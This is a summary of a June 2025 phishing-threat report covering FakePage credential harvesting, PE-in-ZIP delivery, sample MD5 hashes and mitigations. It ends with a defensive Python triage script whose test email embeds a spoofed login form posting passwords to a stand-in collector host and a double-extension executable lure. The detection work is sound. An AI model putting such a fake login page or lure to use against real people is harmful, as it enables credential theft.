Full Report
This report provides distribution volumes, statistics, trends, and case information on phishing emails and email threats collected and analyzed during June 2025. The following are some of the statistics and cases included in the original report. 1) Statistics of Phishing Email Threats As of June 2025, the most prevalent type of threat among […]
Analysis Summary
# Incident Report: June 2025 Phishing Email Threat Analysis
## Executive Summary
This report summarizes threat intelligence derived from analyzing phishing email activity throughout June 2025, where phishing emails comprised 66% of all analyzed threats. Attackers primarily used HTML scripts or embedded hyperlinks in documents (like PDFs) to direct victims to credential-harvesting fake login pages or deliver malware via malicious attachments (Scripts, Documents, or ZIP archives containing PEs). The primary impact is credential compromise and malware distribution, necessitating continuous user education and security control updates.
## Incident Details
- **Discovery Date:** Analysis conducted throughout June 2025 (Ongoing monitoring)
- **Incident Date:** June 2025 (Period of analysis for reported trends)
- **Affected Organization:** Not specified (Trend analysis across multiple sources)
- **Sector:** General (Across various organization types targeted by email threats)
- **Geography:** Not specified (Though Korean language phishing cases were analyzed)
## Timeline of Events
The timeline reflects the typical lifecycle of email-borne threats observed during the analysis period:
### Initial Access
- **Date/Time:** Throughout June 2025
- **Vector:** Email phishing, specifically using attachments (Scripts, Documents, Compressed files) or malicious hyperlinks embedded in documents.
- **Details:** Threat actors used HTML scripts mimicking legitimate login/promotional pages (logos, fonts) to harvest credentials on fake websites or distributed malware via attachments.
### Lateral Movement
- *Not detailed in the context provided, as the focus is on initial delivery and credential harvesting.*
### Data Exfiltration/Impact
- **Details:** Credentials entered into spoofed login pages were sent to threat actor C2 servers, or malicious attachments led to malware execution (FakePage content delivered as Document or Script attachments, or PE files delivered inside ZIP archives).
### Detection & Response
- **Detection:** Threats were identified through ongoing security monitoring and analysis of reported samples (ATIP analysis).
- **Response Actions:** Analysis included identifying attachment types, C2 addresses, and malicious file hashes (MD5s provided below), facilitating defense updates.
## Attack Methodology
- **Initial Access:** Phishing emails containing malicious scripts or documents with 'VIEW HERE' hyperlinks.
- **Persistence:** *Not detailed.*
- **Privilege Escalation:** *Not detailed.*
- **Defense Evasion:** HTML scripts that closely mimic legitimate login screens (logos, fonts); executables (PEs) compressed inside ZIP archives, which can slip past attachment filters and endpoint scanners that do not inspect archive contents.
- **Credential Access:** Delivering **FakePage** spoofed login pages as script attachments or via hyperlinks in documents, capturing the credentials users enter into them.
- **Discovery:** *Not detailed.*
- **Lateral Movement:** *Not detailed.*
- **Collection:** Gathering user credentials.
- **Exfiltration:** Sending harvested credentials to attacker C2 servers.
- **Impact:** Credential theft and execution of malware (PE files).
## Impact Assessment
- **Financial:** *Not specified.*
- **Data Breach:** Credentials (account access) were the primary target/exposure.
- **Operational:** Potential disruption dependent on the success rate of malware execution or subsequent unauthorized system access.
- **Reputational:** *Not specified.*
## Indicators of Compromise
*Note: This is a summary of a threat intelligence report; the C2 domains it references are not reproduced here, and any indicators taken from the original should be defanged before sharing.*
- **Network indicators:** C2 addresses are listed in the original report but not reproduced in this summary.
- **File indicators (Sample MD5 Hashes from the report):**
- 0b8ccb3c3156659dcfc873a3ed7a6932
- 17ad811df3fce5d582c8f85b6d388884
- 1bac5e9901105a62cb7d98a82c02b9d7
- 1c7b665d471b04b38061295f0eb28f62
- 1eb436524511236fc33ea53162812248
- **Behavioral indicators:** Use of HTML scripts to spoof login pages; embedding hyperlinks in PDFs/Documents directing users to external sites; distribution of PE files inside ZIP archives.
## Response Actions
Specific response actions for *individual* compromises were not detailed, but general mitigation involves:
- **Containment:** Blocking known malicious file hashes and C2 infrastructure identified during triage.
- **Eradication:** Removing malware payloads from infected systems (if any were successfully executed).
- **Recovery:** Resetting credentials potentially exposed via successful phishing attempts.
## Lessons Learned
- Phishing remains the most prevalent email-borne threat (66% prevalence).
- Attackers effectively utilize common document formats (PDFs, DOCs) to hide malicious hyperlinks leading to credential harvesting sites (FakePages).
- There is a growing trend of packaging executable files (PEs) within standard ZIP archives for delivery.
- Analyzing frequently used attachment titles and Korean keywords can help preemptively tune defenses.
## Recommendations
- **Email Gateway Hardening:** Enhance filtering capabilities for emails containing embedded hyperlinks within document attachments.
- **User Training:** Conduct targeted training focused specifically on recognizing highly-realistic spoofed login pages (HTML/CSS mimicry) and the dangers of clicking links inside seemingly benign documents (PDFs, Word files).
- **Endpoint Protection:** Ensure the email gateway and endpoint protection (EDR) inspect the contents of compressed archives (ZIP) and block or quarantine archives carrying executable (PE) members before they can be extracted and run.
- **Credential Hygiene:** Enforce multi-factor authentication (MFA) on all accounts, so that a harvested password alone no longer grants access.
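As an added example (not part of the original report or of AhnLab's tooling), the following Python script turns the behavioral indicators listed under Indicators of Compromise and the hash-blocking and archive-inspection recommendations above into a triage check that runs on a raw email: it hashes every attachment against the report's MD5 list, flags HTML attachments that contain a password field whose form posts to an external URL (the FakePage pattern), and opens ZIP attachments in memory to find PE members by the `MZ` magic or a double extension. The sample message, its sender/recipient domains, the collector URL and the file names are constructed for the demonstration and are not indicators from the report.

```python
import email
import hashlib
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# MD5s from the report's IoC list, used here as a simple blocklist.
KNOWN_BAD_MD5 = {
    "0b8ccb3c3156659dcfc873a3ed7a6932",
    "17ad811df3fce5d582c8f85b6d388884",
    "1bac5e9901105a62cb7d98a82c02b9d7",
    "1c7b665d471b04b38061295f0eb28f62",
    "1eb436524511236fc33ea53162812248",
}

# FakePage heuristics: a password field plus a form that posts to an absolute URL.
PASSWORD_INPUT = re.compile(rb"<input[^>]*type\s*=\s*['\"]?password", re.I)
FORM_ACTION = re.compile(rb"<form[^>]*action\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
PE_EXTENSIONS = (".exe", ".scr", ".dll", ".com", ".pif")


def check_html(data: bytes) -> list[str]:
    """Flag HTML that looks like a credential-harvesting login page."""
    findings = []
    if PASSWORD_INPUT.search(data):
        findings.append("html: password field")
        for m in FORM_ACTION.finditer(data):
            findings.append("html: form posts to " + m.group(1).decode(errors="replace"))
    return findings


def check_zip(data: bytes) -> list[str]:
    """Look inside a ZIP for PE members without extracting anything to disk."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["zip: corrupt or not a zip"]
    findings = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:  # encrypted member: cannot be inspected, so flag it
                findings.append("zip: encrypted member " + info.filename)
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic is needed, not the whole member
            if head == b"MZ" or info.filename.lower().endswith(PE_EXTENSIONS):
                findings.append("zip: PE inside archive: " + info.filename)
    return findings


def analyze_message(raw: bytes) -> dict[str, list[str]]:
    """Return {attachment name: [findings]} for every attachment of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        name = part.get_filename() or "<unnamed>"
        lname = name.lower()
        findings = []
        digest = hashlib.md5(data).hexdigest()
        if digest in KNOWN_BAD_MD5:
            findings.append("hash: matches report IoC " + digest)
        ctype = part.get_content_type()
        if ctype == "text/html" or lname.endswith((".html", ".htm")):
            findings += check_html(data)
        elif data.startswith(b"PK\x03\x04") or lname.endswith(".zip"):
            findings += check_zip(data)
        elif data.startswith(b"MZ"):
            findings.append("pe: bare executable attachment")
        report[name] = findings
    return report


def build_sample_email() -> bytes:
    """Constructed test message (hypothetical names and domains) with three attachments."""
    msg = EmailMessage()
    msg["From"] = "billing@sender.example"
    msg["To"] = "user@victim.example"
    msg["Subject"] = "Invoice - VIEW HERE"
    msg.set_content("Please review the attached invoice.")
    # Spoofed login page: copied logo plus a form that posts credentials off-site.
    fake_page = (
        b"<html><body><img src='logo.png'>"
        b"<form method='post' action='https://collector.example/post.php'>"
        b"<input name='email'><input type='password' name='pw'>"
        b"<button>Sign in</button></form></body></html>"
    )
    msg.add_attachment(fake_page, maintype="text", subtype="html", filename="Invoice_view.html")
    # ZIP whose only member carries the 'MZ' PE magic behind a double extension.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2025-06.pdf.exe", b"MZ" + b"\x00" * 62)
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Invoice.zip")
    msg.add_attachment(b"Thanks,\nBilling", maintype="text", subtype="plain", filename="note.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in analyze_message(build_sample_email()).items():
        print(name, "->", findings or ["clean"])
```

The hash lookup is only as good as the feed behind it and will miss repacked samples, which is why the structural checks matter more in practice: the HTML rule catches any page that asks for a password and posts it to an absolute URL, whatever branding it copies, and the ZIP check reads only the first two bytes of each member so no payload is ever written to disk. Encrypted members are reported rather than silently skipped, since an archive the scanner cannot open should be quarantined, not passed through.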